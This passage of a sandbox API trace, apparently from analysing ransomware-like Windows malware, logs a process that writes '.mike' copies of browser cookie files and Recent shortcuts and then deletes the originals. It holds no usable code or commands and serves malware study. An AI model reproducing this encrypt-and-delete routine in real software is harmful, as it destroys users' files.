lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.543] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", dwFileAttributes=0x80) returned 1 [0149.544] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt")) returned 1 [0149.546] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.552] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", dwFileAttributes=0x80) returned 1 [0149.552] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt")) returned 1 [0149.555] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.560] WriteFile (in: hFile=0x1d4, lpBuffer=0x22f4fc8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x22f4fc8*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0149.561] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt", dwFileAttributes=0x80) returned 1 [0149.561] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt")) returned 1 [0149.563] WriteFile (in: hFile=0x1d4, lpBuffer=0x22f88c0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aefe0, lpOverlapped=0x0 | out: lpBuffer=0x22f88c0*, lpNumberOfBytesWritten=0x2aefe0*=0x45e, lpOverlapped=0x0) returned 1 [0149.564] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.565] WriteFile (in: hFile=0x1d4, lpBuffer=0x22fc06c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x22fc06c*, lpNumberOfBytesWritten=0x2aef9c*=0x220, lpOverlapped=0x0) returned 1 [0149.568] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mike", nBufferLength=0x105, lpBuffer=0x2aea28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mike", lpFilePart=0x0) returned 0x79 [0149.568] WriteFile (in: hFile=0x1d4, lpBuffer=0x23004b4*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x23004b4*, lpNumberOfBytesWritten=0x2aef9c*=0xc0, lpOverlapped=0x0) returned 1 [0149.571] WriteFile (in: hFile=0x1d4, lpBuffer=0x2303770*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x2303770*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0149.571] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt", dwFileAttributes=0x80) returned 1 [0149.572] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt")) returned 1 [0149.574] WriteFile (in: hFile=0x1d4, lpBuffer=0x23070fc*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aefe0, lpOverlapped=0x0 | out: lpBuffer=0x23070fc*, lpNumberOfBytesWritten=0x2aefe0*=0x45e, lpOverlapped=0x0) returned 1 [0149.575] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.576] WriteFile (in: hFile=0x1d4, lpBuffer=0x230a7d0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x230a7d0*, lpNumberOfBytesWritten=0x2aef9c*=0x220, lpOverlapped=0x0) returned 1 [0149.580] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.mike", nBufferLength=0x105, lpBuffer=0x2aea28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.mike", lpFilePart=0x0) returned 0x75 [0149.580] WriteFile (in: hFile=0x1d4, lpBuffer=0x210e01c*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x210e01c*, lpNumberOfBytesWritten=0x2aef9c*=0xe0, lpOverlapped=0x0) returned 1 [0149.582] WriteFile (in: hFile=0x1d4, lpBuffer=0x21112c8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x21112c8*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0149.583] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt", dwFileAttributes=0x80) returned 1 [0149.583] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt")) returned 1 [0149.585] WriteFile (in: hFile=0x1d4, lpBuffer=0x2114be4*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aefe0, lpOverlapped=0x0 | out: lpBuffer=0x2114be4*, lpNumberOfBytesWritten=0x2aefe0*=0x45e, lpOverlapped=0x0) returned 1 [0149.587] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.588] WriteFile (in: hFile=0x1d4, lpBuffer=0x2118390*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x2118390*, lpNumberOfBytesWritten=0x2aef9c*=0x220, lpOverlapped=0x0) returned 1 [0149.590] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.mike", nBufferLength=0x105, lpBuffer=0x2aea28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.mike", lpFilePart=0x0) returned 0x79 [0149.591] WriteFile (in: hFile=0x1d4, lpBuffer=0x211c7a8*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x211c7a8*, lpNumberOfBytesWritten=0x2aef9c*=0xb0, lpOverlapped=0x0) returned 1 [0149.593] WriteFile (in: hFile=0x1d4, lpBuffer=0x211fa64*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x211fa64*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0149.594] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", dwFileAttributes=0x80) returned 1 [0149.594] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt")) returned 1 [0149.596] WriteFile (in: hFile=0x1d4, lpBuffer=0x21233f0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aefe0, lpOverlapped=0x0 | out: lpBuffer=0x21233f0*, lpNumberOfBytesWritten=0x2aefe0*=0x45e, lpOverlapped=0x0) returned 1 [0149.598] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0149.599] WriteFile (in: hFile=0x1d4, lpBuffer=0x2126a74*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x2126a74*, lpNumberOfBytesWritten=0x2aef9c*=0x220, lpOverlapped=0x0) returned 1 [0149.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.mike", nBufferLength=0x105, lpBuffer=0x2aea28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.mike", lpFilePart=0x0) returned 0x74 [0149.602] WriteFile (in: hFile=0x1d4, lpBuffer=0x212c390*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x212c390*, lpNumberOfBytesWritten=0x2aef9c*=0x410, lpOverlapped=0x0) returned 1 [0149.605] WriteFile (in: hFile=0x1d4, lpBuffer=0x212f63c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x212f63c*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0149.605] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt", dwFileAttributes=0x80) returned 1 [0149.606] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt")) returned 1 [0149.608] WriteFile (in: hFile=0x1d4, lpBuffer=0x2132f34*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aefe0, lpOverlapped=0x0 | out: lpBuffer=0x2132f34*, lpNumberOfBytesWritten=0x2aefe0*=0x45e, lpOverlapped=0x0) returned 1 [0149.621] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.621] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.621] CoTaskMemFree (pv=0x4e1c10) [0149.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.624] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.624] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.625] CoTaskMemFree (pv=0x4e1c10) [0149.626] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.626] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.626] CoTaskMemFree (pv=0x4e1c10) [0149.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.629] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.629] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.629] CoTaskMemFree (pv=0x4e1c10) [0149.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.631] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.631] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.631] CoTaskMemFree (pv=0x4e1c10) [0149.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.636] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0149.636] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.636] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.636] CoTaskMemFree (pv=0x4e1c10) [0149.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.638] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.638] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.638] CoTaskMemFree (pv=0x4e1c10) [0149.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.640] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.640] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.640] CoTaskMemFree (pv=0x4e1c10) [0149.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.643] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.643] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.643] CoTaskMemFree (pv=0x4e1c10) [0149.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.645] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0149.645] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.645] CoTaskMemFree (pv=0x4e1c10) [0149.661] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.666] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-xAanFEPdy.lnk", dwFileAttributes=0x80) returned 1 [0149.667] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-xAanFEPdy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\-xaanfepdy.lnk")) returned 1 [0149.670] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.675] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0UfqQAZUiJ.lnk", dwFileAttributes=0x80) returned 1 [0149.676] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0UfqQAZUiJ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0ufqqazuij.lnk")) returned 1 [0149.679] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.687] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1Q6NkUamHGep.lnk", dwFileAttributes=0x80) returned 1 [0149.688] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1Q6NkUamHGep.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1q6nkuamhgep.lnk")) returned 1 [0149.690] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.696] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2n3cs_q.lnk", dwFileAttributes=0x80) returned 1 [0149.697] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2n3cs_q.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\2n3cs_q.lnk")) returned 1 [0149.699] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.705] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2tOUSYKInUwNv4X.lnk", dwFileAttributes=0x80) returned 1 [0149.705] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2tOUSYKInUwNv4X.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\2tousykinuwnv4x.lnk")) returned 1 [0149.708] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.713] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\33Mrma9Ge34b9JXlU6AE.ots.lnk", dwFileAttributes=0x80) returned 1 [0149.714] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\33Mrma9Ge34b9JXlU6AE.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\33mrma9ge34b9jxlu6ae.ots.lnk")) returned 1 [0149.726] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.732] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3biM98XncEHgqHKkbpX.lnk", dwFileAttributes=0x80) returned 1 [0149.733] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3biM98XncEHgqHKkbpX.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\3bim98xncehgqhkkbpx.lnk")) returned 1 [0149.735] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.740] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3RKKK.lnk", dwFileAttributes=0x80) returned 1 [0149.741] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3RKKK.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\3rkkk.lnk")) returned 1 [0149.744] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.749] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3vDH1Swlmabeo.lnk", dwFileAttributes=0x80) returned 1 [0149.749] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3vDH1Swlmabeo.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\3vdh1swlmabeo.lnk")) returned 1 [0149.752] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.757] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4bxvedCN_.lnk", dwFileAttributes=0x80) returned 1 [0149.758] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4bxvedCN_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\4bxvedcn_.lnk")) returned 1 [0149.760] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.766] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4_6pp.lnk", dwFileAttributes=0x80) returned 1 [0149.766] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4_6pp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\4_6pp.lnk")) returned 1 [0149.769] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.774] SetFileAttributesW 